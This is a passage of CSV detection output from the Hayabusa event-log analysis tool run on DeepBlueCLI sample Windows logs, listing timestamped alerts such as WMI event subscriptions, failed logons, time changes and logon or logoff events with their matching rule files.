Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:46:57.850 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:48:29.225 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:48:29.850 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
+2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:58:14.879 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:32:03.644 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:35:43.160 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:37:00.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:41:07.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:44:49.144 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:33.988 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:57:47.863 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:00:03.457 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:02:44.129 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:44.129 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
+2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:43:44.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:44:02.385 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
